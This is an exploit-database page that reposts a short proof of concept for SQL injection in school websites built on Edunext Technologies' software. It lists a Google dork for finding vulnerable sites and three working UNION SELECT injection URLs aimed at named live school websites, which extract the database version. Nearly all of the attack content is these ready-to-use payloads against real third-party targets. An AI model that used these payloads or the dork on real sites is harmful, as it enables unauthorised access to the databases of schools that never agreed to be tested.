Advertisement






Edunext Technologies - Sql Injection Vulnerability

CVE Category Price Severity
Not available CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2023-10-01
CVSS
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023100001

Below is a copy:

Edunext Technologies - Sql Injection Vulnerability
*********************************************************
#Exploit Title: Edunext Technologies - Sql Injection Vulnerability
#Date: 2023-09-30
#Exploit Author: Behrouz Mansoori
#Google Dork: "Powered by Edunext Technologies"
#Category:webapps
#Tested On: Mac, Firefox

Proof of Concept:

### Demo :

https://sfsindirapuram.com/Recent-Activities-Detail.php?id=-62%27%20union%20select%20version(),2,3,4,5--+

https://sunvalleyncr.in/Events-Detail.php?id=-41%27%20union%20select%20version(),2,3,4,5--+

https://kvmpublicschool.org/notice.php?id=-33%20union%20select%201,version(),3,4,5,6,7,8,9--+
*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]
*********************************************************

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.